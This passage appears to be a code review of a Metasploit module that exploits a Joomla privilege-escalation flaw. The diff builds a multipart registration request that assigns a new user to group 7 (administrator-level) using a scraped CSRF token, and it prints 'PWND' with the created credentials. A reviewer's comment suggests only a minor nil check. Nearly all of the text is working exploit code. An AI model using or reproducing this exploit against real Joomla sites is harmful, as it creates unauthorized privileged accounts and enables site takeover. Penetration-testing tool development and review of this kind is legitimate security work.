modules/auxiliary/admin/http/joomla_privilege_escalation.rb

```diff
@@ -0,0 +1,140 @@
+      }
+    )
+
+    cookie = response.get_cookies
+    csrf = response.body.match(/name="(\w{32})"/i).captures[0]
+
+    boundary = "157247343414135650641514240823"
+
+    ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
+
+    post_data = ""
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[name]\"" + "\r\n\r\n"
+    post_data << datastore['USERNAME'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[username]\"" + "\r\n\r\n"
+    post_data << datastore['USERNAME'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[groups][]\"" + "\r\n\r\n"
+    post_data << "7" + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[password1]\"" + "\r\n\r\n"
+    post_data << datastore['PASSWORD'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[password2]\"" + "\r\n\r\n"
+    post_data << datastore['PASSWORD'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[email1]\"" + "\r\n\r\n"
+    post_data << datastore['EMAIL'] + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"user[email2]\"" + "\r\n\r\n"
+    post_data << datastore['EMAIL']  + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"option\"" + "\r\n\r\n"
+    post_data << "com_users" + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"task\"" + "\r\n\r\n"
+    post_data << "user.register" + "\r\n"
+    post_data << "-----------------------------#{boundary}" + "\r\n"
+    post_data << "Content-Disposition: form-data; name=\"#{csrf}\"" + "\r\n\r\n"
+    post_data << "1" + "\r\n"
+    post_data << "-----------------------------#{boundary}--" + "\r\n"
+
+    res = send_request_raw(
+      {
+        'uri' => normalize_uri(target_uri.path, 'index.php/component/users/?task=user.register'),
+        'method' => 'POST',
+        'data' => post_data,
+        'headers' =>
+        {
+          'Content-Length' => post_data.length,
+          'Content-Type'  => ctype,
+          'Cookie'  => cookie
+        }
+      }
+    )
+
+    if res && res.code == 200
+      print_good("PWND - Your user has been created")
+      print_status("\tUsername: " + datastore['USERNAME'])
+      print_status("\tPassword: " + datastore['PASSWORD'])
+    else
+      if res && res.code == 303
+        while res.code == 303 do
```

Comment:
You should still check `res` as well, in case things blow up.
``` ruby
while res && res.code == 303
```
Picky, I know ;)